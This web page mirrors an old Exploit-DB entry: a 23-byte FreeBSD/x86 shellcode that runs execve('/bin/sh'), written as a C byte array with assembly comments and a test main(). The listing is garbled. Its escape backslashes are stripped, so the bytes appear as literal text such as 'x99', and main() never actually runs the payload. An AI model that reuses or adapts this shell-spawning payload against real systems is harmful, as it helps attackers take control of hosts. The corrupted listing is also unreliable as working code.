FreeBSD/x86 – execve(/bin/sh) Shellcode (23 bytes) (2)-安全小百科

FreeBSD/x86 – execve(/bin/sh) Shellcode (23 bytes) (2)

漏洞ID	1054679	漏洞类型
发布时间	2004-09-26	更新时间	2004-09-26
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	FreeBSD_x86	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/13273

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

/* FreeBSD 23 byte execve code. Greetz to anathema, the first who published  *
 * this way of writing shellcodes.                                           *
 *  greetz to preedator                              marcetam                *
 *                                                [email protected]         *
 ****************************************************************************/

char fbsd_execve[]=
  "x99"                  /* cdq              */
  "x52"                  /* push %edx        */
  "x68x6ex2fx73x68"  /* push $0x68732f6e */
  "x68x2fx2fx62x69"  /* push $0x69622f2f */
  "x89xe3"              /* movl %esp,%ebx   */
  "x51"                  /* push %ecx - or %edx :) */
  "x52"                  /* push %edx - or %ecx :) */
  "x53"                  /* push %ebx        */
  "x53"                  /* push %ebx        */
  "x6ax3b"              /* push $0x3b       */
  "x58"                  /* pop %eax         */
  "xcdx80";             /* int $0x80        */

int main() {
  void (*run)()=(void *)fbsd_execve;
  printf("%d bytes n",strlen(fbsd_execve));
}

// milw0rm.com [2004-09-26]

相关推荐: VBZoom 1.0 – Arbitrary File Upload

VBZoom 1.0 – Arbitrary File Upload 漏洞ID 1053629 漏洞类型发布时间 2002-10-09 更新时间 2002-10-09 CVE编号 N/A CNNVD-ID N/A 漏洞平台 PHP CVSS评分 N/A |漏…

文章版权归作者所有，未经允许请勿转载。

THE END